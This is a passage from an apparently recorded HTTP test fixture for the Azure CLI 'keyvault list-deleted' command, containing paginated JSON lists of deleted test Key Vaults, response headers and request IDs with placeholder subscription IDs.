gm6zy2bkojevjjurz7uck6i6ahbvuye6bkk/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-4bafqr","location":"westus","tags":{},"deletionDate":"2020-03-22T05:30:41Z","scheduledPurgeDate":"2020-06-20T05:30:41Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/cli-test-kv-se-sd-iyqyku","name":"cli-test-kv-se-sd-iyqyku","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_secret_soft_deletelwy6ql3akqidtxeqcvuokb2nuf2xlchtkpcasbw/providers/Microsoft.KeyVault/vaults/cli-test-kv-se-sd-iyqyku","location":"westus","tags":{},"deletionDate":"2020-03-21T14:43:21Z","scheduledPurgeDate":"2020-06-19T14:43:21Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultlrwkd","name":"vaultlrwkd","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_encryptionyeqs5zuuerrapgcvzfu5eql62nxwjr25cqjfprkauyppyklrwq6/providers/Microsoft.KeyVault/vaults/vaultlrwkd","location":"westus","tags":{},"deletionDate":"2020-03-20T18:41:42Z","scheduledPurgeDate":"2020-06-18T18:41:42Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-nblk54xr2ky27b","name":"vault-nblk54xr2ky27b","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_nyintdokzcbvouvsn74gvltn7kwegt75iwzqc3d354vx2x/providers/Microsoft.KeyVault/vaults/vault-nblk54xr2ky27b","location":"westcentralus","tags":{},"deletionDate":"2020-03-23T09:07:31Z","scheduledPurgeDate":"2020-06-21T09:07:31Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-onccbbmfasmsmn","name":"vault-onccbbmfasmsmn","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_sjlxi6j4kfqx7vinw25fdke6iamh4lctajcikusdnzyrkw/providers/Microsoft.KeyVault/vaults/vault-onccbbmfasmsmn","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:41:55Z","scheduledPurgeDate":"2020-06-18T18:41:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-rci35nsn37ak3","name":"vault4-rci35nsn37ak3","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_j2eeh3jbr33nl6kvutnl4zxlngw5srnbi52zi/providers/Microsoft.KeyVault/vaults/vault4-rci35nsn37ak3","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:55Z","scheduledPurgeDate":"2020-06-18T18:35:55Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault3-qu6vguhdwlaui","name":"vault3-qu6vguhdwlaui","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_disk_update_ues3ormjmqfphd3p62tfg6rr3ian4upxso/providers/Microsoft.KeyVault/vaults/vault3-qu6vguhdwlaui","location":"westcentralus","tags":{},"deletionDate":"2020-03-20T18:35:11Z","scheduledPurgeDate":"2020-06-18T18:35:11Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault1567","name":"vault1567","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/fytest1567/providers/Microsoft.KeyVault/vaults/vault1567","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T14:52:14Z","scheduledPurgeDate":"2020-06-17T14:52:14Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/byokacraccr-kv","name":"byokacraccr-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/byokacraccr/providers/Microsoft.KeyVault/vaults/byokacraccr-kv","location":"westus2","tags":{},"deletionDate":"2020-01-12T17:14:08Z","scheduledPurgeDate":"2020-04-11T17:14:08Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus2/deletedVaults/yugangwwu2-kv","name":"yugangwwu2-kv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yugangwwu2/providers/Microsoft.KeyVault/vaults/yugangwwu2-kv","location":"westus2","tags":{},"deletionDate":"2020-01-06T17:13:54Z","scheduledPurgeDate":"2020-04-05T17:13:54Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault1","name":"zuhvault1","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault1","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault2","name":"zuhvault2","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault2","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvault","name":"zuhvault","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvault","location":"eastus2euap","tags":{},"deletionDate":"2020-03-12T15:12:04Z","scheduledPurgeDate":"2020-06-10T15:12:04Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/ygtestkv","name":"ygtestkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/test/providers/Microsoft.KeyVault/vaults/ygtestkv","location":"eastus2euap","tags":{},"deletionDate":"2020-03-02T04:46:15Z","scheduledPurgeDate":"2020-05-31T04:46:15Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2euap/deletedVaults/zuhvalut","name":"zuhvalut","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/zuh/providers/Microsoft.KeyVault/vaults/zuhvalut","location":"eastus2euap","tags":{},"deletionDate":"2020-01-21T06:58:01Z","scheduledPurgeDate":"2020-04-20T06:58:01Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygmanualcmkkv","name":"ygmanualcmkkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/ygmanualcmk/providers/Microsoft.KeyVault/vaults/ygmanualcmkkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/cmkacrkv","name":"cmkacrkv","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/cmkacrkv","location":"centraluseuap","tags":{},"deletionDate":"2020-02-25T17:11:25Z","scheduledPurgeDate":"2020-05-25T17:11:25Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/ygcmk","name":"ygcmk","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cmk/providers/Microsoft.KeyVault/vaults/ygcmk","location":"centraluseuap","tags":{},"deletionDate":"2020-02-23T17:11:27Z","scheduledPurgeDate":"2020-05-23T17:11:27Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/centraluseuap/deletedVaults/vault15871","name":"vault15871","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/yurg/providers/Microsoft.KeyVault/vaults/vault15871","location":"centraluseuap","tags":{},"deletionDate":"2020-01-13T17:11:21Z","scheduledPurgeDate":"2020-04-12T17:11:21Z","purgeProtectionEnabled":true}}],"nextLink":"https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3Zdrb%2bI4FIb%2fC1rtp6U4CezQSqNVwA4TtscZG5tR%2bo0m4WJTqAodwKP57%2fNmL%2f0PIIEUJAt0Hr%2bXw4%2fOrjkfHzc7f%2bg8%2fOjIQpsvYyGNTh%2ftrPPQWR%2bPr4eHXu9lsVusmpdmd7xbhPe35q7av%2fQO78%2bH6m3zetzsd4cee46Wf%2fY%2fRd3oecm6%2fbpedBdNlXSr5%2fv4U7xk94N71nt923%2ff1M3boUeb6m1%2f2C%2bPd383l%2fnifXvs1c22OTb1Px8Ofy1eN93vOIkv%2fxyz6L7L8Ip%2b%2f%2b3g8Yt73%2bw%2bWz%2f%2fpudTo63OjJjbmb0vHu3WLnkekVldJBeMnD8VPD2TozPx7ZD4OiOe9yXLB9LkODMXBd9OlPP9woxGhXkaUUjP2lWdPzoinZmr53AueNXH%2fEG6PJG8GpBbD2XQgry4kLCxNj6W3J6U2Y6ktWflc1ZYBTZg5VJw%2bCZmRlhdfBVXromWRVIYH7XakG4FTehhYZ8yKVQszbS9fy65iimsBbhE0lQX7fOBtjbSJv9PE%2bksT2%2bABJRAuHlMGVKoYz0kJsfSZSMyIpa%2bDFBFX5nVQAaFM0%2bcmD0XUAjcBRKzwpovrUVuAMeFMCIZe5KcEBi%2bL%2floSGE6lgbBwGEQocetSYjlAaZhytQTabYCRjlTKD%2fCIr5%2bXeCuXT6ggHt2PqGghxqu0M4iTdcTZSSXooxV8AzAEoDINC%2fP0qWJZAQQN1Mg5HKMLDCav0DykP1oCD3E0tWZMjYmV48kR5CGFZ7TWBlxKYRg2kyzQqj%2fLXIrPNrwHLQs4BGU5eqCsBwqtzpJN820qWISGtIQSWEFvFSiRHRG5mlCNkehWvBoi%2bT6C1UGm5BJ21iEBXLYpB6qUEaQ%2f0U6FCdTiM5srEU2VoHiQtigrUq00VzZtkRaDjcjCxlK4MjRnwKNksIqiE5TnqjdI4SAPDKB6Iwgi6BCPZYMCcIQpQ7omPiQxbVHJzrEx1guAMIOCpQloUO0p1i5%2bQi9gaWzRK9MkRfrkWJloh0B3OqsxXyseeuPfxfOWNj065X3yIVche3Kt6ER8Iz94gnbN4LAokuMP0mjsI3WGVTRqiZBjMbKUyQtzONbGB8GuQkcyAFpCDjaGoUW%2bHRIHkZweAfsEMJiKZ3iz4lnymIN42kgP51ooaCPsvPz5y8%3d"}' headers: cache-control: - no-cache content-length: - '26873' content-type: - application/json; charset=utf-8 date: - Mon, 23 Mar 2020 10:23:21 GMT expires: - '-1' pragma: - no-cache strict-transport-security: - max-age=31536000; includeSubDomains vary: - Accept-Encoding x-content-type-options: - nosniff x-ms-original-request-ids: - dddf9117-ba7f-43e0-98db-e18fdcac828e - 7ebda397-0f48-4e4b-8a2a-48722b87ac21 - 04816ae4-46c7-4fa9-9e91-14b67f72b201 - c96786dc-1c77-4ed1-a62f-7f7135d5a05e - a38ef378-7c79-4efa-948b-60437fd0eb5f - 9a8fe721-4ffd-4c3b-ad04-66ce2b457270 - 8faa5fc5-5a00-4cbf-b6a8-5f3f20d128d0 - b995aa80-77de-4c8e-a152-84128ac4285d - ccf042cc-b909-4fc3-b8bd-e9e6b11a79ea - b61f1c00-9b3b-4fef-bd83-eaef89a04cdb - 49857a31-e884-40e0-a122-78136a715f01 - 4a8d48ce-d9dc-4490-9b94-0a55287b2bb3 - 13297ca8-8e20-4e45-b137-9068d0683c0c - f009618b-650c-4a7b-8afa-6aa8975df46f - 687fef72-9994-4af9-8634-a51c49b5904a - 00489927-6edc-43c8-b671-073335a41a57 - 635ffe7c-6560-47fb-ab79-61fed66cdaf5 - bfd5205b-30e7-49e0-be71-cade1c3868e4 - b9092fe7-842a-4ad4-ae3a-ae1db952787d - 7d7dfcfb-613b-4f37-a815-f593283f7a7b - 3a1705d5-ae07-46a7-b59f-89b85103372e - 45647e8a-d534-44ed-aa83-e0c892c16f2f - b1051525-18c7-44c7-bf5f-e1993c99499a - 0f93da49-525d-4975-a7d1-f0fe00de3116 - 2c519f70-c196-44b5-a7cd-d358453eb28f - 1f7b9cf6-ee70-44c2-947a-81f500f80a0c - 40edeb48-6d1f-4e6f-8ce7-7c0b0f43f489 - 9aff83db-39eb-44c8-88c1-f91b03c8c4ac - bbcb7230-013f-434d-8548-c42a24a1c554 - 9e46fe0a-fdbf-4325-a8cf-141181b306ae - c1ff9d87-7d39-45ba-ad59-1f81238ba56e - 6efbef92-9a00-451c-9ae6-bd073ba3014b - ac6e4117-c468-4b83-8040-3534bf18d434 - 08356574-e711-4017-bcfd-867753e6a23d - 35e79999-6cf3-4626-a741-99ba8400c048 status: code: 200 message: OK - request: body: null headers: Accept: - application/json Accept-Encoding: - gzip, deflate CommandName: - keyvault list-deleted Connection: - keep-alive ParameterSetName: - --query User-Agent: - python/3.7.6 (Windows-10-10.0.18362-SP0) msrest/0.6.11 msrest_azure/0.6.3 azure-mgmt-keyvault/2.2.0 Azure-SDK-For-Python AZURECLI/2.2.0 accept-language: - en-US method: GET uri: https://management.azure.com/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/deletedVaults?api-version=2019-09-01&%24skiptoken=3Zdrb%2BI4FIb%2FC1rtp6U4CezQSqNVwA4TtscZG5tR%2Bo0m4WJTqAodwKP57%2FNmL%2F0PIIEUJAt0Hr%2BXw4%2FOrjkfHzc7f%2Bg8%2FOjIQpsvYyGNTh%2FtrPPQWR%2BPr4eHXu9lsVusmpdmd7xbhPe35q7av%2FQO78%2BH6m3zetzsd4cee46Wf%2FY%2FRd3oecm6%2FbpedBdNlXSr5%2Fv4U7xk94N71nt923%2Ff1M3boUeb6m1%2F2C%2BPd383l%2FnifXvs1c22OTb1Px8Ofy1eN93vOIkv%2Fxyz6L7L8Ip%2B%2F%2B3g8Yt73%2Bw%2BWz%2F%2FpudTo63OjJjbmb0vHu3WLnkekVldJBeMnD8VPD2TozPx7ZD4OiOe9yXLB9LkODMXBd9OlPP9woxGhXkaUUjP2lWdPzoinZmr53AueNXH%2FEG6PJG8GpBbD2XQgry4kLCxNj6W3J6U2Y6ktWflc1ZYBTZg5VJw%2BCZmRlhdfBVXromWRVIYH7XakG4FTehhYZ8yKVQszbS9fy65iimsBbhE0lQX7fOBtjbSJv9PE%2BksT2%2BABJRAuHlMGVKoYz0kJsfSZSMyIpa%2BDFBFX5nVQAaFM0%2BcmD0XUAjcBRKzwpovrUVuAMeFMCIZe5KcEBi%2BL%2FloSGE6lgbBwGEQocetSYjlAaZhytQTabYCRjlTKD%2FCIr5%2BXeCuXT6ggHt2PqGghxqu0M4iTdcTZSSXooxV8AzAEoDINC%2FP0qWJZAQQN1Mg5HKMLDCav0DykP1oCD3E0tWZMjYmV48kR5CGFZ7TWBlxKYRg2kyzQqj%2FLXIrPNrwHLQs4BGU5eqCsBwqtzpJN820qWISGtIQSWEFvFSiRHRG5mlCNkehWvBoi%2BT6C1UGm5BJ21iEBXLYpB6qUEaQ%2F0U6FCdTiM5srEU2VoHiQtigrUq00VzZtkRaDjcjCxlK4MjRnwKNksIqiE5TnqjdI4SAPDKB6Iwgi6BCPZYMCcIQpQ7omPiQxbVHJzrEx1guAMIOCpQloUO0p1i5%2BQi9gaWzRK9MkRfrkWJloh0B3OqsxXyseeuPfxfOWNj065X3yIVche3Kt6ER8Iz94gnbN4LAokuMP0mjsI3WGVTRqiZBjMbKUyQtzONbGB8GuQkcyAFpCDjaGoUW%2BHRIHkZweAfsEMJiKZ3iz4lnymIN42kgP51ooaCPsvPz5y8%3D response: body: string: '{"value":[{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultjpmdzl4","name":"cmk-test-keyvaultjpmdzl4","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgr3mmf5ovjlvgx6uwqszqkeuorsvg4sq6akmydhfxakjvubv33l5iuw2djejbeu43f/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultjpmdzl4","location":"eastus","tags":{},"deletionDate":"2020-02-28T18:05:53Z","scheduledPurgeDate":"2020-05-28T18:05:53Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultsxb4xod","name":"cmk-test-keyvaultsxb4xod","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgohuwgetrhtp7ahwt3ks43jjn7dq6obysvqvvqwnswhbwz6bkf4s555si5663rkbgj/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultsxb4xod","location":"eastus","tags":{},"deletionDate":"2020-02-21T18:06:32Z","scheduledPurgeDate":"2020-05-21T18:06:32Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultljiwj6d","name":"cmk-test-keyvaultljiwj6d","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgsy3hjh444ebogt5cux2esfjquelih6z3aqjewpvsnavgjlv3ooqskop4lzkj2hmfq/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultljiwj6d","location":"eastus","tags":{},"deletionDate":"2020-02-14T18:06:07Z","scheduledPurgeDate":"2020-05-14T18:06:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/cmk-test-keyvaultp65ayih","name":"cmk-test-keyvaultp65ayih","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgmpsir4o74zkadrennj4yajbcw35x5ulad3idseb3iivba2wdctfj7gek6xjosc76e/providers/Microsoft.KeyVault/vaults/cmk-test-keyvaultp65ayih","location":"eastus","tags":{},"deletionDate":"2020-02-14T08:05:28Z","scheduledPurgeDate":"2020-05-14T08:05:28Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus/deletedVaults/yugangwbyok","name":"yugangwbyok","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/byok/providers/Microsoft.KeyVault/vaults/yugangwbyok","location":"eastus","tags":{},"deletionDate":"2020-01-14T17:14:07Z","scheduledPurgeDate":"2020-04-13T17:14:07Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-iqpuwog5f","name":"cli-test-kv-sd-iqpuwog5f","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sdnhy3f2l2256ml4vwxqku7xyq67h3aef7b4lrxernb3lcwgpidds74om/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-iqpuwog5f","location":"eastus2","tags":{},"deletionDate":"2020-03-10T11:52:46Z","scheduledPurgeDate":"2020-06-08T11:52:46Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/eastus2/deletedVaults/cli-test-kv-sd-zo6utdrzy","name":"cli-test-kv-sd-zo6utdrzy","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_keyvault_sd27edmc7irfd24m55ay36varwfalabczxihhifosa3myekrspfhea4qh/providers/Microsoft.KeyVault/vaults/cli-test-kv-sd-zo6utdrzy","location":"eastus2","tags":{},"deletionDate":"2020-03-10T11:00:43Z","scheduledPurgeDate":"2020-06-08T11:00:43Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestew5s5rywjfrsm6nje","name":"clitestew5s5rywjfrsm6nje","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg53evitammtcea4vbq7ziqzvvenmn5lcfsaxm6b43vsebob7m4ooyrjmxfpijcgfvz/providers/Microsoft.KeyVault/vaults/clitestew5s5rywjfrsm6nje","location":"southcentralus","tags":{},"deletionDate":"2020-02-28T18:39:05Z","scheduledPurgeDate":"2020-05-28T18:39:05Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestj5eozsub47mwxvnkf","name":"clitestj5eozsub47mwxvnkf","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg7vb7j5y52cqkyqf2cedascxgvb2aab4dmojccvugdga3ymwohnr5b7kemqzbfxxu6/providers/Microsoft.KeyVault/vaults/clitestj5eozsub47mwxvnkf","location":"southcentralus","tags":{},"deletionDate":"2020-02-21T18:38:36Z","scheduledPurgeDate":"2020-05-21T18:38:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest7cahvu3btoehwdt46","name":"clitest7cahvu3btoehwdt46","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgor7jamdvofau2muo75vvkynhzw6bc7bmgrqgvydt3lrh3ui53qzp4bkw2g6htmd6e/providers/Microsoft.KeyVault/vaults/clitest7cahvu3btoehwdt46","location":"southcentralus","tags":{},"deletionDate":"2020-02-14T18:39:23Z","scheduledPurgeDate":"2020-05-14T18:39:23Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitest5qbdgaqpzwfrmiz2e","name":"clitest5qbdgaqpzwfrmiz2e","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgedjbhcnjpgxkdnlwaidsd44hwus4zl55ghitw6fsl4rlaeyp3qz6yitwluabrnq2x/providers/Microsoft.KeyVault/vaults/clitest5qbdgaqpzwfrmiz2e","location":"southcentralus","tags":{},"deletionDate":"2020-02-14T14:52:36Z","scheduledPurgeDate":"2020-05-14T14:52:36Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/southcentralus/deletedVaults/clitestjiepysx5n7eqkpj2v","name":"clitestjiepysx5n7eqkpj2v","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rgpb74njrwtokupoobtfal7l3wfb5lhqdn2cek7voov2ogkd4we53p7amvyyend34bz/providers/Microsoft.KeyVault/vaults/clitestjiepysx5n7eqkpj2v","location":"southcentralus","tags":{},"deletionDate":"2020-02-14T14:46:38Z","scheduledPurgeDate":"2020-05-14T14:46:38Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmsecretkv6a2xn6swc5","name":"vmsecretkv6a2xn6swc5","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsgsiviirxbt33s2thvl4upnegbpmrm2ijd7ciofa5vguupfj3uaz2tfvt/providers/Microsoft.KeyVault/vaults/vmsecretkv6a2xn6swc5","location":"westus","tags":{},"deletionDate":"2020-03-20T18:35:49Z","scheduledPurgeDate":"2020-06-18T18:35:49Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvlj5kknoqosr","name":"vmlinuxkvlj5kknoqosr","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vmss_create_linux_secretsdlzk7ll5vvszb4a7yzy75naqevs64twprioi2sajq/providers/Microsoft.KeyVault/vaults/vmlinuxkvlj5kknoqosr","location":"westus","tags":{},"deletionDate":"2020-03-20T18:34:37Z","scheduledPurgeDate":"2020-06-18T18:34:37Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vaultk7ohb","name":"vaultk7ohb","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_encryptiong4mgtlmysgl7xo2bjacddufojxivbblc5zybcfllb6n3uzpiuhwux/providers/Microsoft.KeyVault/vaults/vaultk7ohb","location":"westus","tags":{},"deletionDate":"2020-03-20T18:33:44Z","scheduledPurgeDate":"2020-06-18T18:33:44Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmkeyvaultwkdksmotf7","name":"vmkeyvaultwkdksmotf7","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/clitest.rg4kndflftjl54tyzo3la3ywla37katzibs5bg7l52pjahr5ddzf4fz6vaaut5t4dld/providers/Microsoft.KeyVault/vaults/vmkeyvaultwkdksmotf7","location":"westus","tags":{},"deletionDate":"2020-03-20T18:29:57Z","scheduledPurgeDate":"2020-06-18T18:29:57Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westus/deletedVaults/vmlinuxkvb7oya6d3gkd","name":"vmlinuxkvb7oya6d3gkd","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_vm_secretsjpdrm65b2eszj56a4dsaliay6c3cuf5sgs3vrd6trt7a3h2nvubuyubh/providers/Microsoft.KeyVault/vaults/vmlinuxkvb7oya6d3gkd","location":"westus","tags":{},"deletionDate":"2020-03-20T18:29:46Z","scheduledPurgeDate":"2020-06-18T18:29:46Z"}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault-77i4k4kkyjefqj","name":"vault-77i4k4kkyjefqj","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_zcxjcbjsod7lo4jsoznxi5foflx62zojj2enahadwu44ge/providers/Microsoft.KeyVault/vaults/vault-77i4k4kkyjefqj","location":"westcentralus","tags":{},"deletionDate":"2020-03-19T08:22:32Z","scheduledPurgeDate":"2020-06-17T08:22:32Z","purgeProtectionEnabled":true}},{"id":"/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.KeyVault/locations/westcentralus/deletedVaults/vault4-veli246l32qrp","name":"vault4-veli246l32qrp","type":"Microsoft.KeyVault/deletedVaults","properties":{"vaultId":"/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/cli_test_disk_encryption_set_snapshot_ystqze4c54rdyl7td32yo3swnik2